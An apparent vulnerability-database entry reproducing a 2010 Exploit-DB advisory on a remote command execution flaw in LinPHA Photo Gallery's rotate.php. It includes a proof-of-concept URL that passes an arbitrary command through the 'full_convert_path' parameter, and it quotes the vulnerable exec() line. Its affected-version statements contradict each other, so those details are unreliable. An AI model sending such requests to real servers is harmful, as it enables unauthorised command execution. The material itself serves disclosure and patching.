Remote Command Execution Vulnerability

vendor:

LinPHA Photo Gallery

by:

Sn!pEr.S!Te Hacker

9,3

CVSS

HIGH

Remote Command Execution

CWE

Product Name: LinPHA Photo Gallery

Affected Version From: 1.3.2

Affected Version To: 1.3.4

Patch Exists: YES

Related CWE: N/A

CPE: a:linpha:linpha

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Remote Command Execution Vulnerability

A Remote Command Execution vulnerability exists in LinPHA < 1.3.2. An attacker can exploit this vulnerability to execute arbitrary commands on the vulnerable system. This is due to the application not properly sanitizing user-supplied input to the 'full_convert_path' parameter in the 'rotate.php' script. An attacker can exploit this vulnerability by sending a malicious HTTP request containing a malicious command to the vulnerable system.

Mitigation:

Upgrade to the latest version of LinPHA.

Source

Exploit-DB raw data:

        __           __      ___
 __            __  /'__`\        /\ \__  /'__`\                 
/\_\    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __       ___    ___     ___ ___          
\/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\    /'___\ / __`\ /' __` __`\   
 \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/  __/\ \__//\ \L\ \/\ \/\ \/\ \  
  \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\  
   \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/ \/_/\/____/\/___/  \/_/\/_/\/_/
              \ \____/                                           
               \/___/

# ----------------------oOO---(_)---OOo-----------------------
# | __ __ |  
# | _____/ /_____ ______/ /_ __ ______ ______ |  
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |  
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |  
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |  
# | Security Sn!pEr.S!Te /____/ 2o1o |  
# ------------------------------------------------------------
     Remote Command Execution Vulnerability
# ------------------------------------------------------------ 
--------------------------------------------------------------
LinPHA <== 1.3.2 ( rotate.php )

--------------------------------------------------------------

#[+] Author : Sn!pEr.S!Te Hacker #  
# [+] Email : sniper-site@HoTMaiL.coM #  
# [+] T34M Sn!pEr.S!Te Hacker #  
# [+] 16-5-2010 # 
# [+] Script : lmage » LinPHA Photo Gallery#
# [+] Download:http://sourceforge.net/projects/linpha/files/linpha/linpha-1.3.4/linpha-1.3.4.zip/download # 
# Version: [1.3.2] #

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
Exploit : linpha-1.3.4\actions\rotate.php


http://localhost/linpha-1.3.4\actions\rotate.php?full_convert_path= [your command]


htpp://127.0.0.1/linpha-1.3.4\actions\rotate.php?full_convert_path= [your command]


exec($full_convert_path.' -rotate '.$rotate.' '.escape_string($img2rotate).' '.escape_string($img2rotate));

line : 78




web site Favorites my  : http://inj3ct0r.com/  & http://www.hack0wn.com/ & http://www.exploit-db.com



friend my : liar - sm Hacker -baby hacker -dmar -saleh Hacker - ALhal alsab -  
            Mr.SaTaN - abo badr - aStoorh alqssim - Ramad Hacker- h-ex - 
            yousfe - Hiter.3rb - QAHER ALRAFDE - DjHacker - My Heart - Mr.koka-